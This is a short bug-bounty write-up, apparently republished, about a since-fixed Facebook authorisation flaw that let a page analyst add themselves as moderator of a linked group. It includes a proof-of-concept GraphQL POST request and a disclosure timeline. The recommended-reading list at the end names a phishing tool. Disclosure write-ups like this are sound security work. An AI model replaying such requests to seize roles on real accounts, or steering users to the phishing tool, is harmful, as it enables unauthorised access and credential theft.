Facebook PageAnalyst Could Add oneself as Moderator on Group

11 Jan 2019 - onehackzero

Description

   There is a call to add member as the moderator on a group. The call at the time didn’t seem to have any authorisation checks to page roles. A page analyst was possible to add oneself as a moderator on a linked group.

Proof of Concept

HTTP POST

graph.facebook.com/graphql/

query_id=QUERYID

query_params={"0":{"user_id":"UserID","admin_type":"MODERATOR","actor_id":"PageID","client_mutation_id":"","source":"treehouse_group_mall","group_id":"GroupID"}}

Timeline

  • Dec 19, 2018 - Report Sent
  • Dec 22, 2018 - Further investigation by Facebook
  • Jan 9, 2019 - Fixed by Facebook
  • Jan 11, 2019 - Bounty Awarded by Facebook
[embedded content]

为您推荐了相关的技术文章:

  1. 98.01% of sites on Cloudflare now use IPv6 – Cloudflare – Medium
  2. Popping a shell on the Oculus developer portal
  3. EXFiLTRATED
  4. FlashME! – WordPress vulnerability disclosure [CVE-2016-9263] | OpnSec
  5. GitHub - UndeadSec/SocialFish: Ultimate phishing tool with Ngrok integrated.

原文链接: www.symbo1.com